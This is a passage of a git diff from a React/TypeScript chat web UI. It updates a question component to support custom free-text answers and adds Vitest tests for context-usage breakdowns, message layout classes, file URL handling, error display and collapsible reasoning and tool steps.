-          const label = optionLabel(opt);
-          const desc = optionDescription(opt);
-          const selected = answer.includes(label);
+        {options.map(opt => {
+          const label = opt.label;
+          const desc = opt.description;
+          const selected = opt.custom ? customSelected : answer.includes(label);
           return (
-            <button
-              key={label}
-              onClick={() => toggle(label)}
-              disabled={disabled}
-              className={`w-full text-left rounded-lg border px-3 py-2 text-sm transition-all flex items-start gap-2.5 ${
-                selected
-                  ? 'border-purple-500 bg-purple-500 text-white shadow-sm'
-                  : 'border-gray-200 bg-white text-gray-700 hover:border-purple-300 hover:bg-purple-50'
-              }`}
-            >
-              {multiple ? (
-                <span
-                  className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded border-2 flex items-center justify-center ${
-                    selected ? 'border-white bg-white' : 'border-gray-400 bg-transparent'
-                  }`}
-                >
-                  {selected && <Check className="w-2.5 h-2.5 text-purple-500" strokeWidth={3} />}
-                </span>
-              ) : (
-                <span
-                  className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded-full border-2 flex items-center justify-center ${
-                    selected ? 'border-white' : 'border-gray-400'
-                  }`}
-                >
-                  {selected && <span className="w-2 h-2 rounded-full bg-white block" />}
-                </span>
-              )}
-              <span>
-                <span className={`font-medium ${compact ? 'text-xs' : 'text-sm'}`}>{label}</span>
-                {desc && (
-                  <span className={`block mt-0.5 ${compact ? 'text-[11px]' : 'text-xs'} ${selected ? 'text-purple-100' : 'text-gray-400'}`}>
-                    {desc}
+            <div key={label}>
+              <button
+                onClick={() => (opt.custom ? toggleCustom() : toggle(label))}
+                disabled={disabled}
+                className={`w-full text-left rounded-lg border px-3 py-2 text-sm transition-all flex items-start gap-2.5 ${
+                  selected
+                    ? 'border-purple-500 bg-purple-500 text-white shadow-sm'
+                    : 'border-gray-200 bg-white text-gray-700 hover:border-purple-300 hover:bg-purple-50'
+                }`}
+              >
+                {multiple ? (
+                  <span
+                    className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded border-2 flex items-center justify-center ${
+                      selected ? 'border-white bg-white' : 'border-gray-400 bg-transparent'
+                    }`}
+                  >
+                    {selected && <Check className="w-2.5 h-2.5 text-purple-500" strokeWidth={3} />}
+                  </span>
+                ) : (
+                  <span
+                    className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded-full border-2 flex items-center justify-center ${
+                      selected ? 'border-white' : 'border-gray-400'
+                    }`}
+                  >
+                    {selected && <span className="w-2 h-2 rounded-full bg-white block" />}
                   </span>
                 )}
-              </span>
-            </button>
+                <span>
+                  <span className={`font-medium ${compact ? 'text-xs' : 'text-sm'}`}>{label}</span>
+                  {desc && (
+                    <span className={`block mt-0.5 ${compact ? 'text-[11px]' : 'text-xs'} ${selected ? 'text-purple-100' : 'text-gray-400'}`}>
+                      {desc}
+                    </span>
+                  )}
+                </span>
+              </button>
+              {opt.custom && selected && (
+                <div className="mt-1.5 rounded-lg border border-purple-100 bg-white px-3 py-2">
+                  <TextInput
+                    q={{ ...q, type: 'text', placeholder: q.placeholder || t('question.textPlaceholder'), multiline: q.multiline ?? true }}
+                    answer={[customText]}
+                    onChange={(value) => setCustomText(value[0] ?? '')}
+                    disabled={disabled}
+                    compact={compact}
+                  />
+                </div>
+              )}
+            </div>
           );
         })}
       </div>
@@ -400,11 +535,16 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
     });
   };
 
-  const canSubmit = questions.every((q, i) => isQuestionAnswered(q, answers[i] ?? []));
+  const canSubmit = questions.every((q, i) => (
+    isQuestionAnswered(q, answers[i] ?? [], isInlineTextFollowUp(questions[i - 1], q))
+  ));
 
   const handleSubmit = async () => {
+    const normalizedAnswers = questions.map((q, i) => (
+      normalizeAnswerForSubmit(q, answers[i] ?? [], isInlineTextFollowUp(questions[i - 1], q))
+    ));
     setSubmitting(true);
-    try { await onAnswer(answers); } finally { setSubmitting(false); }
+    try { await onAnswer(normalizedAnswers); } finally { setSubmitting(false); }
   };
 
   const handleReject = async () => {
@@ -428,9 +568,17 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
       {/* Questions */}
       <div className={`${px} ${py} space-y-5`}>
         {questions.map((q, qIdx) => {
+          if (isInlineTextFollowUp(questions[qIdx - 1], q)) return null;
+
           const type = resolveType(q);
           const answer = answers[qIdx] ?? [];
-          const inputProps = { q, answer, onChange: (v: string[]) => setAnswer(qIdx, v), disabled: submitting, compact };
+          const inlineFollowUp = type === 'choice' && isInlineTextFollowUp(q, questions[qIdx + 1])
+            ? questions[qIdx + 1]
+            : undefined;
+          const inputQuestion = inlineFollowUp && q.custom === undefined ? { ...q, custom: false } : q;
+          const inputProps = { q: inputQuestion, answer, onChange: (v: string[]) => setAnswer(qIdx, v), disabled: submitting, compact };
+          const inlineFollowUpIdx = inlineFollowUp ? qIdx + 1 : -1;
+          const inlineFollowUpAnswer = inlineFollowUp ? (answers[inlineFollowUpIdx] ?? []) : [];
 
           return (
             <div key={qIdx}>
@@ -442,6 +590,25 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
               <div className={`${textSm} font-medium text-gray-800 mb-2`}>{q.question}</div>
 
               {type === 'choice'   && <ChoiceInput   {...inputProps} />}
+              {inlineFollowUp && (
+                <div className="mt-2 rounded-lg border border-purple-100 bg-white px-3 py-2.5">
+                  <div className={`${compact ? 'text-[11px]' : 'text-xs'} font-medium text-slate-700`}>
+                    {inlineTextHeader(inlineFollowUp, t('question.customAnswer'))}
+                  </div>
+                  <div className={`${compact ? 'text-[11px]' : 'text-xs'} mt-1 text-slate-500 leading-relaxed`}>
+                    {inlineFollowUp.question}
+                  </div>
+                  <div className="mt-2">
+                    <TextInput
+                      q={{ ...inlineFollowUp, placeholder: inlineFollowUp.placeholder || 'none' }}
+                      answer={inlineFollowUpAnswer}
+                      onChange={(v) => setAnswer(inlineFollowUpIdx, v)}
+                      disabled={submitting}
+                      compact={compact}
+                    />
+                  </div>
+                </div>
+              )}
               {type === 'text'     && <TextInput     {...inputProps} />}
               {type === 'number'   && <NumberInput   {...inputProps} />}
               {type === 'password' && <PasswordInput {...inputProps} />}
diff --git a/webui/src/components/common/SessionChat.test.ts b/webui/src/components/common/SessionChat.test.ts
index 0c5fe4f63..fed4b3476 100644
--- a/webui/src/components/common/SessionChat.test.ts
+++ b/webui/src/components/common/SessionChat.test.ts
@@ -1,5 +1,5 @@
 import React from 'react';
-import { render, screen, waitFor } from '@testing-library/react';
+import { act, render, screen, waitFor } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 
@@ -7,18 +7,24 @@ import type { Message } from '@/types';
 
 import {
   areChatMessagePartsRenderEqual,
+  buildContextUsageBreakdown,
   buildTodoSummary,
   ChatToolPart,
   dedupeUploadedDocumentAttachments,
   default as SessionChat,
+  getCompactionDividerClassName,
   getEditingActionBarClassName,
   getMessageBubbleClassName,
+  getMessageErrorText,
   getMessageGroupClassName,
+  getRenderableThinkingText,
   getRenderableFileUrl,
   getRegenerateTruncateTarget,
   getStandaloneThinkingBubbleClassName,
   getUserAvatarContainerClassName,
   getUserAvatarSpacerClassName,
+  hasActiveToolPart,
+  isActiveSessionStatus,
   listUploadedDocumentPaths,
   shouldRenderMessage,
   shouldRefetchFinishedMessage,
@@ -35,14 +41,42 @@ const sessionApiRunQueuedPromptNowMock = vi.fn();
 const sessionApiUpdateMessagePartMock = vi.fn();
 const sessionApiResendMessageMock = vi.fn();
 const sessionApiRegenerateMessageMock = vi.fn();
+const sessionApiGetContextUsageMock = vi.fn();
+const sessionApiGetMock = vi.fn();
 const useSessionMessagesMock = vi.fn();
-const tMock = (key: string) => ({
+const useSSEOptionsRef = vi.hoisted(() => ({ current: null as any }));
+const tMock = (key: string, options?: Record<string, unknown>) => {
+  const value = ({
   'chat.placeholder': '请输入消息',
   'chat.emptyText': '暂无消息',
   'chat.sending': '发送中...',
   'chat.thinking': '思考中...',
   'chat.streaming': '继续输出中...',
+  'chat.process.title': '过程（{{count}} 项）',
+  'chat.process.reasoningCount': '{{count}} 段思考',
+  'chat.process.toolCount': '{{count}} 次工具调用',
   'chat.compacting': '压缩中...',
+  'chat.contextCompressed': '上下文已压缩',
+  'chat.contextUsage.title': 'Context Usage',
+  'chat.contextUsage.close': 'Close',
+  'chat.contextUsage.full': '13% Full',
+  'chat.contextUsage.tokens': '~13 / 100 Tokens',
+  'chat.contextUsage.excludedTokens': '100 excluded',
+  'chat.contextUsage.noAttributedSegments': 'No attributed breakdown',
+  'chat.contextUsage.breakdown.systemPrompt': 'System prompt',
+  'chat.contextUsage.breakdown.toolDefinitions': 'Tool definitions',
+  'chat.contextUsage.breakdown.tools': 'Tool calls',
+  'chat.contextUsage.breakdown.skillLoad': 'Skill loads',
+  'chat.contextUsage.breakdown.agentDelegation': 'Agent delegation',
+  'chat.contextUsage.breakdown.conversation': 'Conversation',
+  'chat.contextUsage.breakdown.reasoning': 'Reasoning',
+  'chat.contextUsage.breakdown.draft': 'Current draft',
+  'chat.contextUsage.breakdown.compactedHistory': 'Compacted history',
+  'chat.goal.dismiss': 'Dismiss goal notice',
+  'chat.goal.status.active': 'Goal',
+  'chat.goal.status.completed': 'Completed',
+  'chat.goal.status.blocked': 'Blocked',
+  'chat.goal.status.paused': 'Paused',
   'chat.mention.title': '选择 Agent',
   'chat.mention.navigate': '导航',
   'chat.mention.select': '选择',
@@ -53,8 +87,18 @@ const tMock = (key: string) => ({
   'chat.tool.inputParams': '输入参数',
   'chat.tool.outputResult': '输出结果',
   'chat.tool.todoStages': 'Todo 阶段',
+  'chat.tool.todoStatus.pending': '待办',
+  'chat.tool.todoStatus.inProgress': '进行中',
+  'chat.tool.todoStatus.completed': '完成',
+  'chat.tool.todoStatus.cancelled': '已取消',
+  'chat.tool.todoSummary.progress': '进度',
+  'chat.tool.todoSummary.inProgress': '进行中',
+  'chat.tool.todoSummary.completed': '完成',
+  'chat.tool.todoSummary.done': '完成',
   'smartAssistant': '智能助手',
-}[key] ?? key);
+  }[key] ?? key);
+  return value.replace(/\{\{(\w+)\}\}/g, (_, name) => String(options?.[name] ?? ''));
+};
 const pendingQuestionsHookMock = {
   pendingQuestions: {},
   handleQuestionAsked: vi.fn(),
@@ -82,7 +126,10 @@ vi.mock('@/hooks/useSessions', () => ({
 }));
 
 vi.mock('@/hooks/useSSE', () => ({
-  useSSE: () => ({ status: 'connected' }),
+  useSSE: (options: any) => {
+    useSSEOptionsRef.current = options;
+    return { status: 'connected' };
+  },
 }));
 
 vi.mock('@/hooks/useReasoningToggle', () => ({
@@ -112,6 +159,7 @@ vi.mock('@/api/client', () => ({
 
 vi.mock('@/api/session', () => ({
   sessionApi: {
+    get: (...args: unknown[]) => sessionApiGetMock(...args),
     listPromptQueue: (...args: unknown[]) => sessionApiListPromptQueueMock(...args),
     enqueuePrompt: (...args: unknown[]) => sessionApiEnqueuePromptMock(...args),
     updateQueuedPrompt: (...args: unknown[]) => sessionApiUpdateQueuedPromptMock(...args),
@@ -120,22 +168,26 @@ vi.mock('@/api/session', () => ({
     updateMessagePart: (...args: unknown[]) => sessionApiUpdateMessagePartMock(...args),
     resendMessage: (...args: unknown[]) => sessionApiResendMessageMock(...args),
     regenerateMessage: (...args: unknown[]) => sessionApiRegenerateMessageMock(...args),
+    getContextUsage: (...args: unknown[]) => sessionApiGetContextUsageMock(...args),
   },
 }));
 
 beforeEach(() => {
   vi.clearAllMocks();
-  if (typeof window.localStorage?.clear !== 'function') {
-    Object.defineProperty(window, 'localStorage', {
-      configurable: true,
-      value: {
-        clear: vi.fn(),
-        getItem: vi.fn(),
-        setItem: vi.fn(),
-        removeItem: vi.fn(),
-      },
-    });
-  }
+  const localStorageData = new Map<string, string>();
+  Object.defineProperty(window, 'localStorage', {
+    configurable: true,
+    value: {
+      clear: vi.fn(() => localStorageData.clear()),
+      getItem: vi.fn((key: string) => localStorageData.get(key) ?? null),
+      setItem: vi.fn((key: string, value: string) => {
+        localStorageData.set(key, String(value));
+      }),
+      removeItem: vi.fn((key: string) => {
+        localStorageData.delete(key);
+      }),
+    },
+  });
   window.localStorage.clear();
   Object.defineProperty(window.HTMLElement.prototype, 'scrollIntoView', {
     configurable: true,
@@ -151,7 +203,20 @@ beforeEach(() => {
   sessionApiUpdateMessagePartMock.mockResolvedValue({});
   sessionApiResendMessageMock.mockResolvedValue({});
   sessionApiRegenerateMessageMock.mockResolvedValue({});
+  sessionApiGetMock.mockResolvedValue({});
+  sessionApiGetContextUsageMock.mockResolvedValue({
+    sessionID: 'sess-1',
+    usedTokens: 0,
+    contextWindow: 0,
+    percent: 0,
+    source: 'estimated',
+    estimatedTokens: 0,
+    compactedTokens: 0,
+    segments: [],
+    excludedSegments: [],
+  });
   pendingQuestionsHookMock.fetchPendingQuestions.mockResolvedValue(undefined);
+  useSSEOptionsRef.current = null;
   useSessionMessagesMock.mockReturnValue({
     messages: [],
     loading: false,
@@ -200,13 +265,101 @@ describe('listUploadedDocumentPaths', () => {
   });
 });
 
+describe('buildContextUsageBreakdown', () => {
+  it('excludes compacted history from the current used-token total', () => {
+    const breakdown = buildContextUsageBreakdown([
+      makeMessage({
+        id: 'active',
+        role: 'user',
+        parts: [{ id: 'active-text', type: 'text', text: 'a'.repeat(400) }],
+      }),
+      makeMessage({
+        id: 'archived',
+        compacted: true,
+        parts: [{ id: 'archived-text', type: 'text', text: 'b'.repeat(800) }],
+      }),
+    ], 'c'.repeat(40));
+
+    expect(breakdown.usedTokens).toBe(110);
+    expect(breakdown.compactedTokens).toBe(200);
+    expect(breakdown.segments.map((segment) => [segment.key, segment.tokens])).toEqual([
+      ['systemPrompt', 0],
+      ['toolDefinitions', 0],
+      ['conversation', 110],
+      ['reasoning', 0],
+      ['tools', 0],
+      ['skillLoad', 0],
+      ['agentDelegation', 0],
+    ]);
+    expect(breakdown.excludedSegments).toEqual([]);
+  });
+
+  it('counts compacted tool outputs as a small placeholder', () => {
+    const compactedTime = { start: 1, compacted: 2 };
+    const breakdown = buildContextUsageBreakdown([
+      makeMessage({
+        id: 'tool-msg',
+        parts: [{
+          id: 'tool-part',
+          type: 'tool',
+          tool: 'bash',
+          state: {
+            status: 'completed',
+            input: { command: 'x'.repeat(40) },
+            output: 'y'.repeat(800),
+            time: compactedTime,
+          },
+        }],
+      }),
+    ], '');
+
+    expect(breakdown.usedTokens).toBe(23);
+  });
+
+  it('uses backend snapshots when available and adds the local draft on top', () => {
+    const breakdown = buildContextUsageBreakdown([], 'd'.repeat(40), {
+      sessionID: 'sess-1',
+      usedTokens: 130,
+      contextWindow: 1000,
+      percent: 13,
+      source: 'observed',
+      lastMessageID: 'assistant-1',
+      observedTokens: 130,
+      estimatedTokens: 100,
+      compactedTokens: 50,
+      segments: [
+        { key: 'systemPrompt', tokens: 15, included: true, source: 'estimated' },
+        { key: 'toolDefinitions', tokens: 10, included: true, source: 'estimated' },
+        { key: 'tools', tokens: 40, included: true, source: 'estimated' },
+        { key: 'skillLoad', tokens: 20, included: true, source: 'estimated' },
+        { key: 'agentDelegation', tokens: 10, included: true, source: 'estimated' },
+        { key: 'conversation', tokens: 30, included: true, source: 'estimated' },
+        { key: 'reasoning', tokens: 5, included: true, source: 'observed' },
+      ],
+      excludedSegments: [
+        { key: 'compactedHistory', tokens: 50, included: false, source: 'estimated' },
+      ],
+    });
+
+    expect(breakdown.usedTokens).toBe(140);
+    expect(breakdown.compactedTokens).toBe(50);
+    expect(breakdown.segments.map((segment) => [segment.key, segment.tokens])).toEqual([
+      ['systemPrompt', 15],
+      ['toolDefinitions', 10],
+      ['conversation', 40],
+      ['reasoning', 5],
+      ['tools', 40],
+      ['skillLoad', 20],
+      ['agentDelegation', 10],
+    ]);
+    expect(breakdown.excludedSegments).toEqual([]);
+  });
+});
+
 describe('getMessageBubbleClassName', () => {
-  // The bubble's max width is owned by its outer container (`max-w-[80%]` for
-  // user, `w-full` for assistant; see SessionChat.tsx), so the inner bubble
-  // only controls its own intrinsic sizing (`w-auto` vs `w-full`).  Previously
-  // the inner bubble also pinned `max-w-2xl`, but the unified chat redesign
-  // moved that responsibility outward.  Tests here therefore assert width
-  // semantics, not the legacy `max-w-2xl` literal.
+  // The message column owns the available width, so the inner bubble only
+  // controls intrinsic sizing (`w-auto` vs `w-full`). Tests here therefore
+  // assert width semantics, not legacy max-width literals.
   it('keeps non-editing user bubbles auto-sized in full layout', () => {
     const className = getMessageBubbleClassName({
       compact: false,
@@ -238,29 +391,51 @@ describe('getMessageBubbleClassName', () => {
 
     expect(className).toContain('w-full');
   });
+
+  it('fills the fixed compact assistant message column', () => {
+    const className = getMessageBubbleClassName({
+      compact: true,
+      isUser: false,
+      isEditing: false,
+    });
+
+    expect(className).toContain('w-full');
+    expect(className).toContain('max-w-full');
+  });
+
+  it('keeps compact user bubbles content-sized when not editing', () => {
+    const className = getMessageBubbleClassName({
+      compact: true,
+      isUser: true,
+      isEditing: false,
+    });
+
+    expect(className).toContain('max-w-full');
+    expect(className.split(/\s+/)).not.toContain('w-full');
+  });
 });
 
 describe('getMessageGroupClassName', () => {
-  it('caps full-layout user messages at 80% width', () => {
+  it('caps full-layout user messages at 88% width', () => {
     const className = getMessageGroupClassName({
       compact: false,
       isUser: true,
       isEditing: false,
     });
 
-    expect(className).toContain('max-w-[80%]');
+    expect(className).toContain('max-w-[88%]');
     expect(className).toContain('w-fit');
   });
 
-  it('expands editing user messages to the 80% container width', () => {
+  it('expands editing user messages to the full content width', () => {
     const className = getMessageGroupClassName({
       compact: false,
       isUser: true,
       isEditing: true,
     });
 
-    expect(className).toContain('w-[80%]');
-    expect(className).toContain('max-w-[80%]');
+    expect(className).toContain('w-full');
+    expect(className).toContain('max-w-full');
   });
 
   it('keeps assistant messages full width in full layout', () => {
@@ -272,6 +447,30 @@ describe('getMessageGroupClassName', () => {
 
     expect(className).toBe('w-full');
   });
+
+  it('uses the full compact message-list width for assistant messages', () => {
+    const className = getMessageGroupClassName({
+      compact: true,
+      isUser: false,
+      isEditing: false,
+    });
+
+    expect(className).toBe('w-full max-w-full');
+  });
+});
+
+describe('getCompactionDividerClassName', () => {
+  it('insets the divider into the assistant content column in full layout', () => {
+    const className = getCompactionDividerClassName(false);
+
+    expect(className).toContain('pl-[42px]');
+    expect(className).toContain('w-full');
+    expect(className).toContain('min-w-0');
+  });
+
+  it('uses the compact assistant inset in compact layout', () => {
+    expect(getCompactionDividerClassName(true)).toContain('pl-[38px]');
+  });
 });
 
 describe('getEditingActionBarClassName', () => {
@@ -305,6 +504,18 @@ describe('getRenderableFileUrl', () => {
     );
   });
 
+  it('converts Windows file URLs without adding a POSIX root prefix', () => {
+    expect(getRenderableFileUrl('file:///C:/Users/demo/Pictures/channel%20image.png')).toBe(
+      '/api/file/download?path=C%3A%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png',
+    );
+  });
+
+  it('preserves UNC file URL hosts for Windows network paths', () => {
+    expect(getRenderableFileUrl('file://server/share/channel%20image.png')).toBe(
+      '/api/file/download?path=%2F%2Fserver%2Fshare%2Fchannel%20image.png',
+    );
+  });
+
   it('leaves browser-readable URLs unchanged', () => {
     expect(getRenderableFileUrl('https://example.com/image.png')).toBe('https://example.com/image.png');
     expect(getRenderableFileUrl('data:image/png;base64,abc')).toBe('data:image/png;base64,abc');
@@ -312,13 +523,12 @@ describe('getRenderableFileUrl', () => {
 });
 
 describe('getUserAvatarContainerClassName', () => {
-  it('moves the user avatar to the bubble side without affecting bubble spacing', () => {
+  it('keeps the user avatar inside the message row', () => {
     const className = getUserAvatarContainerClassName(false);
 
-    expect(className).toContain('absolute');
-    expect(className).toContain('left-full');
-    expect(className).toContain('ml-2.5');
-    expect(className).toContain('translate-y-1/2');
+    expect(className).toContain('flex-shrink-0');
+    expect(className).not.toContain('absolute');
+    expect(className).not.toContain('left-full');
     expect(className).toContain('h-8');
   });
 
@@ -328,12 +538,12 @@ describe('getUserAvatarContainerClassName', () => {
 });
 
 describe('getUserAvatarSpacerClassName', () => {
-  it('uses a shorter spacer in full layout to keep the top gap compact', () => {
-    expect(getUserAvatarSpacerClassName(false)).toBe('h-4');
+  it('does not reserve out-of-flow space in full layout', () => {
+    expect(getUserAvatarSpacerClassName(false)).toBe('h-0');
   });
 
-  it('uses a proportional spacer in compact layout', () => {
-    expect(getUserAvatarSpacerClassName(true)).toBe('h-3.5');
+  it('does not reserve out-of-flow space in compact layout', () => {
+    expect(getUserAvatarSpacerClassName(true)).toBe('h-0');
   });
 });
 
@@ -375,6 +585,50 @@ describe('SessionChat standalone thinking indicator', () => {
   });
 });
 
+describe('SessionChat instruction display text', () => {
+  it('renders metadata displayText while keeping the raw prompt out of the bubble', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'user-instruction',
+          role: 'user',
+          parts: [{
+            id: 'user-instruction-part',
+            type: 'text',
+            text: 'Please read guide.md and generate the full workflow configuration.',
+            metadata: { displayText: '@@flocks-instruction:智能配置' },
+          }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('智能配置')).toBeInTheDocument();
+    expect(screen.queryByText(/Please read guide\.md/)).not.toBeInTheDocument();
+  });
+});
+
+describe('SessionChat composer controls', () => {
+  it('keeps the disabled send button visible in dark mode', () => {
+    const { container } = render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const disabledButtons = Array.from(container.querySelectorAll('button:disabled'));
+    const sendButton = disabledButtons.find((button) => button.querySelector('svg'));
+
+    expect(sendButton?.className).toContain('dark:bg-[#46515e]');
+    expect(sendButton?.className).toContain('dark:text-[#b8c2cc]');
+    expect(sendButton?.className).toContain('dark:border-[#5a6573]');
+  });
+});
+
 describe('shouldRenderMessage', () => {
   it('keeps active empty assistant messages eligible for the thinking indicator', () => {
     expect(shouldRenderMessage(makeMessage({
@@ -403,6 +657,409 @@ describe('shouldRenderMessage', () => {
       error: { code: 'SessionError', message: 'Provider failed' },
     }))).toBe(true);
   });
+
+  it('hides stopped assistant messages that only contain punctuation reasoning', () => {
+    expect(shouldRenderMessage(makeMessage({
+      id: 'assistant-dot',
+      role: 'assistant',
+      finish: 'stop',
+      parts: [
+        {
+          id: 'part-dot',
+          messageID: 'assistant-dot',
+          sessionID: 'sess-1',
+          type: 'reasoning',
+          text: '.',
+        } as any,
+      ],
+    }))).toBe(false);
+  });
+});
+
+describe('getRenderableThinkingText', () => {
+  it('filters punctuation-only reasoning previews', () => {
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '.' } as any)).toBe('');
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '。' } as any)).toBe('');
+  });
+
+  it('keeps meaningful reasoning text', () => {
+    expect(getRenderableThinkingText({ type: 'reasoning', text: '需要更新 todo 状态' } as any)).toBe('需要更新 todo 状态');
+  });
+});
+
+describe('getMessageErrorText', () => {
+  it('prefers user-facing display messages over raw provider errors', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: {
+        message: 'Connection error.',
+        data: {
+          displayMessage: 'Model is unavailable. Please check the provider connection and model configuration.',
+          message: 'Connection error.',
+        },
+      } as any,
+    }))).toBe('Model is unavailable. Please check the provider connection and model configuration.');
+  });
+
+  it('extracts nested provider error messages', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: {
+        name: 'APIConnectionError',
+        data: { message: 'Connection error.' },
+      } as any,
+    }))).toBe('Connection error.');
+  });
+
+  it('falls back to the error code', () => {
+    expect(getMessageErrorText(makeMessage({
+      id: 'assistant-error',
+      error: { code: 'SessionError' } as any,
+    }))).toBe('SessionError');
+  });
+});
+
+describe('SessionChat error rendering', () => {
+  it('renders empty assistant error messages instead of the thinking indicator', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-error',
+          role: 'assistant',
+          parts: [],
+          finish: 'error',
+          error: {
+            name: 'APIConnectionError',
+            data: { message: 'Connection error.' },
+          } as any,
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    const { container } = render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('Connection error.')).toBeInTheDocument();
+    expect(container.querySelectorAll('.animate-bounce')).toHaveLength(0);
+  });
+});
+
+describe('SessionChat intermediate process collapse', () => {
+  it('collapses reasoning and tool steps by default in embedded workflow panels', async () => {
+    const user = userEvent.setup();
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '需要先读取工作流文件',
+            } as any,
+            {
+              id: 'tool-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-1',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.md' },
+                output: 'workflow content',
+              },
+            } as any,
+            {
+              id: 'text-1',
+              messageID: 'assistant-process',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '已读取当前 workflow.md。',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group') as HTMLDetailsElement;
+    expect(processGroup.open).toBe(false);
+    expect(screen.getByText('过程（2 项）')).toBeInTheDocument();
+    expect(screen.getByText('1 段思考 · 1 次工具调用')).toBeInTheDocument();
+    expect(screen.getByText('已读取当前 workflow.md。')).toBeInTheDocument();
+
+    await user.click(screen.getByText('过程（2 项）'));
+
+    expect(processGroup.open).toBe(true);
+    expect(screen.getByText('read')).toBeInTheDocument();
+  });
+
+  it('renders collapsed process groups inside the full compact assistant column', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-width',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-width',
+              messageID: 'assistant-process-width',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '需要先读取当前工作流',
+            } as any,
+            {
+              id: 'tool-width',
+              messageID: 'assistant-process-width',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-width',
+              state: {
+                status: 'running',
+                input: { filePath: 'workflow.md' },
+              },
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group');
+    expect(processGroup.closest('.w-full.max-w-full')).not.toBeNull();
+  });
+
+  it('can default grouped process details open without locking user toggles', async () => {
+    const user = userEvent.setup();
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-open',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-open',
+              messageID: 'assistant-process-open',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '先分析当前会话',
+            } as any,
+            {
+              id: 'tool-open',
+              messageID: 'assistant-process-open',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-open',
+              state: {
+                status: 'completed',
+                input: { filePath: 'session.json' },
+                output: 'ok',
+              },
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true, processGroupsDefaultOpen: true },
+    }));
+
+    const processGroup = screen.getByTestId('chat-process-group') as HTMLDetailsElement;
+    expect(processGroup.open).toBe(true);
+
+    await user.click(screen.getByText('过程（2 项）'));
+
+    expect(processGroup.open).toBe(false);
+  });
+
+  it('does not split collapsed process groups on invisible step markers', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'assistant-process-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'reason-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'reasoning',
+              text: '先读取 workflow.md',
+            } as any,
+            {
+              id: 'tool-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'read',
+              callID: 'call-1',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.md' },
+                output: 'workflow content',
+              },
+            } as any,
+            {
+              id: 'empty-text-1',
+              messageID: 'assistant-process-1',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '',
+            } as any,
+          ],
+        }),
+        makeMessage({
+          id: 'assistant-process-2',
+          role: 'assistant',
